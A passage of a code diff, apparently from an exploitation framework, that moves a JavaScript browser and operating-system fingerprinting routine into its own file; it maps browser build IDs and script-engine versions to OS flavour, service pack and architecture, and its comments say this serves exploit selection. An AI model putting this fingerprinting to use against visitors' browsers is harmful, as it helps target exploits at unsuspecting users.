+			case "20100625231939": ua_version = "3.6.6"; os_name = oses_windows; break;
+			case "20100626104508": ua_version = "3.6.4"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
+			case "20100627211341": ua_version = "3.6.4"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
+			case "20100628082832": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break;
+			case "20100628124739": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20100628143222": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100628232431": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20100629034705": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100629105354": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
+			case "20100630130433": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100630131607": ua_version = "4.0.0.b1"; os_name = oses_mac_osx; break;
+			case "20100630132217": ua_version = "4.0.0.b1"; os_name = oses_linux; break;
+			case "20100630141702": ua_version = "4.0.0.b1"; os_name = oses_windows; break;
+			case "20100630174226": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break;
+			case "20100630180611": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break;
+			case "20100709115208": ua_version = "3.6.7.b1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20100709183408": ua_version = "3.6.7.b1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100716093011": ua_version = "3.6.7.b2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20101203075014": ua_version = "3.6.13"; os_name = oses_windows; break;
+			case "20101206122825": ua_version = "3.6.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
+			default:
+				version = this.searchVersion("Firefox", navigator.userAgent);
+				// Verify whether the ua string is lying by checking if it contains
+				// the major version we detected using known objects above.  If it
+				// appears to be truthful, then use its more precise version number.
+				if (version && version.split(".")[0] == ua_version.split(".")[0]) {
+					// The version number will sometimes end with a space or end of
+					// line, so strip off anything after a space if one exists
+					if (-1 != version.indexOf(" ")) {
+						version = version.substr(0,version.indexOf(" "));
+					}
+					ua_version = version;
+				} else {
+					ua_is_lying = true;
+				}
+				break;
+		}
+		//if (ua_is_lying) { alert("UA is lying"); }
+		//alert(ua_version + " vs " + navigator.userAgent);
+
+		// end navigator.buildID checks
+
+	} else if (typeof ScriptEngineMajorVersion == "function") {
+		// Then this is IE and we can very reliably detect the OS.
+		// Need to add detection for IE on Mac.  Low priority, since we
+		// don't have any sploits for it yet and it's a very low market
+		// share.
+		os_name = oses_windows;
+		ua_name = clients_ie;
+		version = ScriptEngineMajorVersion().toString();
+		version += ScriptEngineMinorVersion().toString();
+		version += ScriptEngineBuildVersion().toString();
+		//document.write("ScriptEngine: "+version+"<br />");
+		switch (version){
+			case "514615":
+				// IE 5.00.2920.0000, 2000 Advanced Server SP0 English
+				ua_version = "5.0";
+				os_flavor = "2000";
+				os_sp = "SP0";
+				break;
+			case "515907":
+				os_flavor = "2000";
+				os_sp = "SP3";	//or SP2: oCC.getComponentVersion('{22d6f312-b0f6-11d0-94ab-0080c74c7e95}', 'componentid') => 6,4,9,1109
+				break;
+			case "518513":
+				os_flavor = "2000";
+				os_sp = "SP4";
+				break;
+			case "566626":
+				// IE 6.0.2600.0000, XP SP0 English
+				// IE 6.0.2800.1106, XP SP1 English
+				ua_version = "6.0";
+				os_flavor = "XP";
+				os_sp = "SP0";
+				break;
+			case "568515":
+				// IE 6.0.3790.0, 2003 Standard SP0 English
+				ua_version = "6.0";
+				os_flavor = "2003";
+				os_sp = "SP0";
+				break;
+			case "568820":
+				// IE 6.0.2900.2180, xp sp2 english
+				os_flavor = "XP";
+				os_sp = "SP2";
+				break;
+			case "568827":
+				os_flavor = "2003";
+				os_sp = "SP1";
+				break;
+			case "568831":	//XP SP2 -OR- 2K SP4
+				if (os_flavor == "2000"){
+					os_sp = "SP4";
+				}
+				else{
+					os_flavor = "XP";
+					os_sp = "SP2";
+				}
+				break;
+			case "568832":
+				os_flavor = "2003";
+				os_sp = "SP2";
+				break;
+			case "568837":
+				// IE 6.0.2900.2180, XP Professional SP2 Korean
+				ua_version = "6.0";
+				os_flavor = "XP";
+				os_sp = "SP2";
+				break;
+			case "5716599":
+				// IE 6.0.2900.5512, XP Professional SP3 English
+				// IE 6.0.2900.5512, XP Professional SP3 Spanish
+				ua_version = "6.0";
+				os_flavor = "XP";
+				os_sp = "SP3";
+				break;
+			case "575730":
+				// IE 7.0.5730.13, Server 2003 Standard SP2 English
+				// IE 7.0.5730.13, Server 2003 Standard SP1 English
+				// IE 7.0.5730.13, XP Professional SP2 English
+				// Rely on the user agent matching above to determine the OS.
+				// This will incorrectly identify 2k3 SP1 as SP2
+				ua_version = "7.0";
+				os_sp = "SP2";
+				break;
+			case "5718066":
+				// IE 7.0.5730.13, XP Professional SP3 English
+				ua_version = "7.0";
+				os_flavor = "XP";
+				os_sp = "SP3";
+				break;
+			case "576000":
+				// IE 7.0.6000.16386, Vista Ultimate SP0 English
+				ua_version = "7.0";
+				os_flavor = "Vista";
+				os_sp = "SP0";
+				break;
+			case "5818702":
+				// IE 8.0.6001.18702, XP Professional SP3 English
+			case "5822960":
+				// IE 8.0.6001.18702, XP Professional SP3 Greek
+				ua_version = "8.0";
+				os_flavor = "XP";
+				os_sp = "SP3";
+				break;
+			case "580":
+				// IE 8.0.7100.0, Windows 7 English
+				// IE 8.0.7100.0, Windows 7 64-bit English
+			case "5816385":
+				// IE 8.0.7600.16385, Windows 7 English
+			case "5816475":
+			case "5816762":
+				// IE 8.0.7600.16385, Windows 7 English
+				ua_version = "8.0";
+				os_flavor = "7";
+				os_sp = "SP0";
+				break;
+			case "9016406":
+				// IE 9.0.7930.16406, Windows 7 64-bit
+				ua_version = "9.0";
+				os_flavor = "7";
+				os_sp = "SP0";
+				break;
+			case "9016441":
+				// IE 9.0.8112.16421, Windows 7 32-bit English
+				ua_version = "9.0";
+				os_flavor = "7";
+				os_sp = "SP1";
+				break;
+
+			//default:
+			//	alert(version);
+			//	break;
+		}
+
+		if (!ua_version) {
+			// The ScriptEngine functions failed us, try some object detection
+			if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") {
+				// IE8 detection straight from IEBlog.  Thank you Microsoft.
+				try {
+					ua_version = "8.0";
+					document.documentElement.style.display = "table-cell";
+				} catch(e) {
+					// This executes in IE7,
+					// but not IE8, regardless of mode
+					ua_version = "7.0";
+				}
+			} else if (document.compatMode) {
+				ua_version = "6.0";
+			} else if (window.createPopup) {
+				ua_version = "5.5";
+			} else if (window.attachEvent) {
+				ua_version = "5.0";
+			} else {
+				ua_version = "4.0";
+			}
+			switch (navigator.appMinorVersion){
+				case ";SP2;":
+					ua_version += ";SP2";
+					break;
+			}
+		}
+	}
+
+	if (!os_name && navigator.platform == "Win32") { os_name = oses_windows; }
+
+	//--
+	// Flavor
+	//--
+	if (!ua_is_lying) {
+		version = useragent.toLowerCase();
+	} else if (navigator.oscpu) {
+		// Then this is Gecko and we can get at least os_name without the
+		// useragent
+		version = navigator.oscpu.toLowerCase();
+	} else {
+		// All we have left is the useragent and we know it's lying, so don't bother
+		version = " ";
+	}
+	if (!os_name || 0 == os_name.length) {
+		if (version.indexOf("windows") != -1)    { os_name = oses_windows; }
+		else if (version.indexOf("mac") != -1)   { os_name = oses_mac_osx; }
+		else if (version.indexOf("linux") != -1) { os_name = oses_linux;   }
+	}
+	if (os_name == oses_windows && (!os_flavor || 0 == os_flavor.length)) {
+		if (version.indexOf("windows 95") != -1)          { os_flavor = "95";    }
+		else if (version.indexOf("windows nt 4") != -1)   { os_flavor = "NT";    }
+		else if (version.indexOf("win 9x 4.9") != -1)     { os_flavor = "ME";    }
+		else if (version.indexOf("windows 98") != -1)     { os_flavor = "98";    }
+		else if (version.indexOf("windows nt 5.0") != -1) { os_flavor = "2000";  }
+		else if (version.indexOf("windows nt 5.1") != -1) { os_flavor = "XP";    }
+		else if (version.indexOf("windows nt 5.2") != -1) { os_flavor = "2003";  }
+		else if (version.indexOf("windows nt 6.0") != -1) { os_flavor = "Vista"; }
+		else if (version.indexOf("windows nt 6.1") != -1) { os_flavor = "7";     }
+	}
+	if (os_name == oses_linux && (!os_flavor || 0 == os_flavor.length)) {
+		if (version.indexOf("gentoo") != -1)       { os_flavor = "Gentoo";  }
+		else if (version.indexOf("ubuntu") != -1)  { os_flavor = "Ubuntu";  }
+		else if (version.indexOf("debian") != -1)  { os_flavor = "Debian";  }
+		else if (version.indexOf("rhel") != -1)    { os_flavor = "RHEL";    }
+		else if (version.indexOf("red hat") != -1) { os_flavor = "RHEL";    }
+		else if (version.indexOf("centos") != -1)  { os_flavor = "CentOS";  }
+		else if (version.indexOf("fedora") != -1)  { os_flavor = "Fedora";  }
+		else if (version.indexOf("android") != -1) { os_flavor = "Android"; }
+	}
+
+	//--
+	// Language
+	//--
+	if (navigator.systemLanguage) {
+		// ie
+		os_lang = navigator.systemLanguage;
+	} else if (navigator.language) {
+		// gecko derivatives, safari, opera
+		os_lang = navigator.language;
+	} else {
+		// some other browser and we don't know how to get the language, so
+		// just guess english
+		os_lang = "en";
+	}
+
+	//--
+	// Architecture
+	//--
+	if (typeof(navigator.cpuClass) != 'undefined') {
+		// Then this is IE or Opera9+ and we can grab the arch directly
+		switch (navigator.cpuClass) {
+			case "x86":
+				arch = arch_x86;
+				break;
+			case "x64":
+				arch = arch_x86_64;
+				break;
+		}
+	}
+	if (!arch || 0 == arch.length) {
+		// We don't have the handy-dandy navagator.cpuClass, so infer from
+		// platform
+		version = navigator.platform;
+		//document.write(version + "\\n");
+		// IE 8 does a bit of wacky user-agent switching for "Compatibility View";
+		// 64-bit client on Windows 7, 64-bit:
+		//     Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)
+		// 32-bit client on Windows 7, 64-bit:
+		//     Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)
+		// 32-bit client on Vista, 32-bit, "Compatibility View":
+		//     Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)
+		//
+		// Report 32-bit client on 64-bit OS as being 32 because exploits will
+		// need to know the bittedness of the process, not the OS.
+		if ( ("Win32" == version) || (version.match(/i.86/)) ) {
+			arch = arch_x86;
+		} else if (-1 != version.indexOf('x64') || (-1 != version.indexOf('x86_64')))  {
+			arch = arch_x86_64;
+		} else if (-1 != version.indexOf('PPC'))  {
+			arch = arch_ppc;
+		}
+	}
+
+	return { os_name:os_name, os_flavor:os_flavor, os_sp:os_sp, os_lang:os_lang, arch:arch, ua_name:ua_name, ua_version:ua_version };
+} // function getVersion
+
+window.os_detect.searchVersion = function(needle, haystack) {
+	var index = haystack.indexOf(needle);
+	var found_version;
+	if (index == -1) { return; }
+	found_version = haystack.substring(index+needle.length+1);
+	if (found_version.indexOf(' ') != -1) {
+		// Strip off any junk at the end such as a CLR declaration
+		found_version = found_version.substring(0,found_version.indexOf(' '));
+	}
+	return found_version;
+}
+
+
+/*
+ * Return -1 if a < b, 0 if a == b, 1 if a > b
+ */
+window.ua_ver_cmp = function(ver_a, ver_b) {
+	// shortcut the easy case
+	if (ver_a == ver_b) {
+		return 0;
+	}
+
+	a = ver_a.split(".");
+	b = ver_b.split(".");
+	for (var i = 0; i < Math.max(a.length, b.length); i++) {
+		// 3.0 == 3
+		if (!b[i]) { b[i] = "0"; }
+		if (!a[i]) { a[i] = "0"; }
+
+		if (a[i] == b[i]) { continue; }
+
+		a_int = parseInt(a[i]);
+		b_int = parseInt(b[i]);
+		a_rest = a[i].substr(a_int.toString().length);
+		b_rest = b[i].substr(b_int.toString().length);
+		if (a_int < b_int) {
+			return -1;
+		} else if (a_int > b_int) {
+			return 1;
+		} else { // ==
+			// Then we need to deal with the stuff after the ints, e.g.:
+			// "b4pre"
+			if (a_rest == "b" && b_rest.length == 0) {
+				return -1;
+			}
+			if (b_rest == "b" && a_rest.length == 0) {
+				return 1;
+			}
+			// Just give up and try a lexicographical comparison
+			if (a_rest < b_rest) {
+				return -1;
+			} else if (a_rest > b_rest) {
+				return 1;
+			}
+		}
+	}
+	// If we get here, they must be equal
+	return 0;
+}
+
+window.ua_ver_lt = function(a, b) {
+	if (-1 == this.ua_ver_cmp(a,b)) { return true; }
+	return false;
+}
+window.ua_ver_gt = function(a, b) {
+	if (1 == this.ua_ver_cmp(a,b)) { return true; }
+	return false;
+}
+window.ua_ver_eq = function(a, b) {
+	if (0 == this.ua_ver_cmp(a,b)) { return true; }
+	return false;
+}
@@ -28,873 +28,9 @@ module Exploitation
 class JavascriptOSDetect < JSObfu

 	def initialize(custom_js = '', opts = {})
-		clients = ::Msf::HttpClients
-		oses    = ::Msf::OperatingSystems
 		@js = custom_js
-		@js = <<ENDJS + @js
-/**
- * This can reliably detect browser versions for IE and Firefox even in the
- * presence of a spoofed User-Agent.  OS detection is more fragile and
- * requires truthful navigator.appVersion and navigator.userAgent strings in
- * order to be accurate for more than just IE on Windows.
- **/
-function getVersion(){
-	//Default values:
-	var os_name;
-	var os_flavor;
-	var os_sp;
-	var os_lang;
-	var ua_name;
-	var ua_version;
-	var arch = "";
-	var useragent = navigator.userAgent;
-	// Trust but verify...
-	var ua_is_lying = false;
+		@js += ::File.read(::File.join(::File.dirname(__FILE__), "javascriptosdetect.js"))

-	var version = "";
-
-	//--
-	// Client
-	//--
-	if (window.opera) {
-		ua_name = "#{clients::OPERA}";
-		if (!navigator.userAgent.match(/Opera/)) {
-			ua_is_lying = true;
-		}
-		// This seems to be completely accurate, e.g. "9.21" is the return
-		// value of opera.version() when run on Opera 9.21
-		ua_version = opera.version();
-		if (!os_name) {
-			// The 'inconspicuous' argument is there to give us a real value on
-			// Opera 6 where, without it, the return value is supposedly
-			// 'Hm, were you only as smart as Bjorn Vermo...'
-			// though I have not verfied this claim.
-			switch (opera.buildNumber('inconspicuous')) {
-				case "344":   // opera-9.0-20060616.1-static-qt.i386-en-344
-				case "2091":  // opera-9.52-2091.gcc3-shared-qt3.i386.rpm
-				case "2444":  // opera-9.60.gcc4-shared-qt3.i386.rpm
-				case "6386":  // 10.61
-					os_name = "#{oses::LINUX}";
-					break;
-				case "8502":  // "Opera 9 Eng Setup.exe"
-				case "8679":  // "Opera_9.10_Eng_Setup.exe"
-				case "8771":  // "Opera_9.20_Eng_Setup.exe"
-				case "8776":  // "Opera_9.21_Eng_Setup.exe"
-				case "8801":  // "Opera_9.22_Eng_Setup.exe"
-				case "10108": // "Opera_952_10108_en.exe"
-				case "10467": // "Opera_962_en_Setup.exe"
-				case "3445":  // 10.61
-					os_name = "#{oses::WINDOWS}";
-					break;
-				case "6386":  // 10.61
-					os_name = "#{oses::MAC_OSX}";
-					break;
-				//default:
-				//	document.write(opera.buildNumber('inconspicuous'));
-				//	break;
-			}
-		}
-	} else if (typeof window.onmousewheel != 'undefined') {
-		// Then this is webkit, could be Safari or Chrome.
-		// Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
-		// Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
-		// Mozilla/5.0 (Linux; U; Android 2.2; en-au; GT-I9000 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
-		// Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8C148
-		// Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
-		// Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3
-
-		// Google Chrome has window.google (older versions), window.chromium (older versions), and window.window.chrome (3+)
-		if (window.chromium || window.google || window.chrome) {
-			ua_name = "#{clients::CHROME}";
-			search = "Chrome";
-		} else {
-			ua_name = "#{clients::SAFARI}";
-			search = "Version";
-		}
-
-		platform = navigator.platform.toLowerCase();
-		// Just to be a pain, iPod and iPad both leave off "Safari" and
-		// "Version" in the UA, see example above.  Grab the webkit version
-		// instead.  =/
-		if (platform.match(/ipod/)) {
-			os_name = "#{oses::MAC_OSX}";
-			os_flavor = "iPod";
-			arch = "#{ARCH_ARMLE}";
-			search = "AppleWebKit";
-		} else if (platform.match(/ipad/)) {
-			os_name = "#{oses::MAC_OSX}";
-			os_flavor = "iPad";
-			arch = "#{ARCH_ARMLE}";
-			search = "AppleWebKit";
-		} else if (platform.match(/iphone/)) {
-			os_name = "#{oses::MAC_OSX}";
-			os_flavor = "iPhone";
-			arch = "#{ARCH_ARMLE}";
-		} else if (platform.match(/macintel/)) {
-			os_name = "#{oses::MAC_OSX}";
-			arch = "#{ARCH_X86}";
-		} else if (platform.match(/linux/)) {
-			os_name = "#{oses::LINUX}";
-			if (platform.match(/x86_64/)) {
-				arch = "#{ARCH_X86_64}";
-			} else if (platform.match(/arm/)) {
-				// Android and maemo
-				arch = "#{ARCH_ARMLE}";
-			}
-		} else if (platform.match(/windows/)) {
-			os_name = "#{oses::WINDOWS}";
-		}
-
-		ua_version = searchVersion(search, navigator.userAgent);
-		if (!ua_version || 0 == ua_version.length) {
-			ua_is_lying = true;
-		}
-	} else if (!document.all && navigator.taintEnabled) {
-		// Use taintEnabled to identify FF since other recent browsers
-		// implement window.getComputedStyle now.  For some reason, checking for
-		// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
-		// isn't IE first.
-		//
-		// Then this is a Gecko derivative, assume Firefox since that's the
-		// only one we have sploits for.  We may need to revisit this in the
-		// future.  This works for multi/browser/mozilla_compareto against
-		// Firefox and Mozilla, so it's probably good enough for now.
-		ua_name = "#{clients::FF}";
-		if (document.readyState) {
-			ua_version = "3.6";
-		} else if (String.trimRight) {
-			ua_version = "3.5";
-		} else if (document.getElementsByClassName) {
-			ua_version = "3";
-		} else if (window.Iterator) {
-			ua_version = "2";
-		} else if (Array.every) {
-			ua_version = "1.5";
-		} else {
-			ua_version = "1";
-		}
-
-		if (navigator.oscpu != navigator.platform) {
-			ua_is_lying = true;
-		}
-		// oscpu is unaffected by changes in the useragent and has values like:
-		//    "Linux i686"
-		//    "Windows NT 6.0"
-		// haven't tested on 64-bit Windows
-		version = navigator.oscpu;
-		if (version.match(/i.86/)) {
-			arch = "#{ARCH_X86}";
-		}
-		if (version.match(/x86_64/)) {
-			arch = "#{ARCH_X86_64}";
-		}
-		if (version.match(/Windows/)) {
-			os_name = "#{oses::WINDOWS}";
-			switch(version) {
-				case "Windows NT 5.0": os_flavor = "2000"; break;
-				case "Windows NT 5.1": os_flavor = "XP"; break;
-				case "Windows NT 5.2": os_flavor = "2003"; break;
-				case "Windows NT 6.0": os_flavor = "Vista"; break;
-				case "Windows NT 6.1": os_flavor = "7"; break;
-			}
-		}
-		if (version.match(/Linux/)) {
-			os_name = "#{oses::LINUX}";
-		}
-		// end navigator.oscpu checks
-
-		// buildID is unaffected by changes in the useragent and typically has
-		// the compile date which in some cases can be used to map to specific
-		// Version & O/S (including Distro and even Arch). Depending upon the
-		// buildID, sometime navigator.productSub will be needed.
-		//
-		// This technique, and the laboriously compiled associated table,
-		// submitted by Mark Fioravanti.
-
-		var buildid = navigator.buildID;
-
-		switch(buildid) {
-			case "2008041514": ua_version = "3.0.0.b5"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2008041515": ua_version = "3.0.0.b5"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "2008052312": ua_version = "3.0.0"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2008052906": ua_version = "3.0.0"; os_name = "#{oses::WINDOWS}"; break;
-			case "2008052909": ua_version = "3.0.0.rc1"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2008052912": ua_version = "3.0.0"; os_name = "#{oses::LINUX}"; break;
-			case "2008060309": ua_version = "3.0.0"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; break;
-			case "2008070205": ua_version = "2.0.0.16"; os_name = "#{oses::WINDOWS}"; break;
-			case "2008070206": ua_version = "3.0.1"; os_name = "#{oses::LINUX}"; break;
-			case "2008070208": ua_version = "3.0.1"; os_name = "#{oses::WINDOWS}"; break;
-			case "2008071222": ua_version = "3.0.1"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2008072820":
-				switch (navigator.productSub) {
-					case "2008072820": ua_version = "3.0.1"; os_name = "#{oses::LINUX}"; break;
-					case "2008092313": ua_version = "3.0.2"; os_name = "#{oses::LINUX}"; break;
-				} break;
-			case "2008082909": ua_version = "2.0.0.17"; os_name = "#{oses::WINDOWS}"; break;
-			case "2008091618": ua_version = "3.0.2"; os_name = "#{oses::LINUX}"; break;
-			case "2008091620": ua_version = "3.0.2"; os_name = "#{oses::WINDOWS}"; break;
-			case "2008092313": ua_version = "3.0.3"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2008092416": ua_version = "3.0.3"; os_name = "#{oses::LINUX}"; break;
-			case "2008092417": ua_version = "3.0.3"; os_name = "#{oses::WINDOWS}"; break;
-			case "2008092510": ua_version = "3.0.4"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2008101315":
-				switch (navigator.productSub) {
-					case "2008101315": ua_version = "3.0.3"; os_name = "#{oses::LINUX}"; break;
-					case "2008111318": ua_version = "3.0.4"; os_name = "#{oses::LINUX}"; arch = "#{ARCH_X86}"; break;
-				} break;
-			case "2008102918": ua_version = "2.0.0.18"; os_name = "#{oses::WINDOWS}"; break;
-			case "2008102920": ua_version = "3.0.4"; break;
-			case "2008111317": ua_version = "3.0.5"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2008111318": ua_version = "3.0.5"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; break;
-			case "2008120119": ua_version = "2.0.0.19"; os_name = "#{oses::WINDOWS}"; break;
-			case "2008120121": ua_version = "3.0.5"; os_name = "#{oses::LINUX}"; break;
-			case "2008120122": ua_version = "3.0.5"; os_name = "#{oses::WINDOWS}"; break;
-			case "2008121709": ua_version = "2.0.0.20"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009011912": ua_version = "3.0.6"; os_name = "#{oses::LINUX}"; break;
-			case "2009011913": ua_version = "3.0.6"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009012615": ua_version = "3.0.6"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2009012616": ua_version = "3.0.6"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2009021906": ua_version = "3.0.7"; os_name = "#{oses::LINUX}"; break;
-			case "2009021910": ua_version = "3.0.7"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009030422": ua_version = "3.0.8"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2009032608": ua_version = "3.0.8"; os_name = "#{oses::LINUX}"; break;
-			case "2009032609": ua_version = "3.0.8"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009032711": ua_version = "3.0.9"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2009033100":
-				switch (navigator.productSub) {
-					case "2009033100": ua_version = "3.0.8"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; break;
-					case "2009042113": ua_version = "3.0.9"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-				} break;
-			case "2009040820": ua_version = "3.0.9"; os_name = "#{oses::LINUX}"; break;
-			case "2009040821": ua_version = "3.0.9"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009042113": ua_version = "3.0.10"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2009042114": ua_version = "3.0.10"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "2009042315": ua_version = "3.0.10"; os_name = "#{oses::LINUX}"; break;
-			case "2009042316": ua_version = "3.0.10"; os_name = "#{oses::WINDOWS}"; break;
-			case "20090427153806": ua_version = "3.5.0.b4"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86}"; break;
-			case "20090427153807": ua_version = "3.5.0.b4"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86_64}"; break;
-			case "2009060214": ua_version = "3.0.11"; os_name = "#{oses::LINUX}"; break;
-			case "2009060215": ua_version = "3.0.11"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009060308":
-				switch (navigator.productSub) {
-					case "2009060308": ua_version = "3.0.11"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-					case "2009070811": ua_version = "3.0.12"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-				} break;
-			case "2009060309":
-				switch (navigator.productSub) {
-					case "2009060309": ua_version = "3.0.11"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; break;
-					case "2009070811": ua_version = "3.0.12"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-				} break;
-			case "2009060310": ua_version = "3.0.11"; os_name = "#{oses::LINUX}"; os_flavor = "BackTrack"; break;
-			case "2009062005": ua_version = "3.0.11"; os_name = "#{oses::LINUX}"; os_flavor = "PCLunixOS"; break;
-			case "20090624012136": ua_version = "3.5.0"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20090624012820": ua_version = "3.5.0"; os_name = "#{oses::LINUX}"; break;
-			case "20090701234143": ua_version = "3.5.0"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86}"; break;
-			case "20090702060527": ua_version = "3.5.0"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86_64}"; break;
-			case "2009070610": ua_version = "3.0.12"; os_name = "#{oses::LINUX}"; break;
-			case "2009070611": ua_version = "3.0.12"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009070811": ua_version = "3.0.13"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; break;
-			case "20090715083437": ua_version = "3.5.1"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20090715083816": ua_version = "3.5.1"; os_name = "#{oses::LINUX}"; break;
-			case "20090715094852": ua_version = "3.5.1"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009072202": ua_version = "3.0.12"; os_name = "#{oses::LINUX}"; os_flavor = "Oracle"; break;
-			case "2009072711": ua_version = "3.0.12"; os_name = "#{oses::LINUX}"; os_flavor = "CentOS"; break;
-			case "20090729211433": ua_version = "3.5.2"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20090729211829": ua_version = "3.5.2"; os_name = "#{oses::LINUX}"; break;
-			case "20090729225027": ua_version = "3.5.2"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009073021": ua_version = "3.0.13"; os_name = "#{oses::LINUX}"; break;
-			case "2009073022": ua_version = "3.0.13"; os_name = "#{oses::WINDOWS}"; break;
-			case "20090824085414": ua_version = "3.5.3"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20090824085743": ua_version = "3.5.3"; os_name = "#{oses::LINUX}"; break;
-			case "20090824101458": ua_version = "3.5.3"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009082707": ua_version = "3.0.14"; break;
-			case "2009090216": ua_version = "3.0.14"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20090914014745": ua_version = "3.5.3"; os_name = "#{oses::LINUX}"; os_flavor = "Mandriva"; arch = "#{ARCH_X86}"; break;
-			case "20090915065903": ua_version = "3.5.3"; os_name = "#{oses::LINUX}"; os_flavor = "Sabayon"; arch = "#{ARCH_X86_64}"; break;
-			case "20090915070141": ua_version = "3.5.3"; os_name = "#{oses::LINUX}"; os_flavor = "Sabayon"; arch = "#{ARCH_X86}"; break;
-			case "20091007090112": ua_version = "3.5.3"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break; // Could also be Mint x86
-			case "20091007095328": ua_version = "3.5.3"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break; // Could also be Mint x86-64
-			case "2009101600":
-				switch (navigator.productSub) {
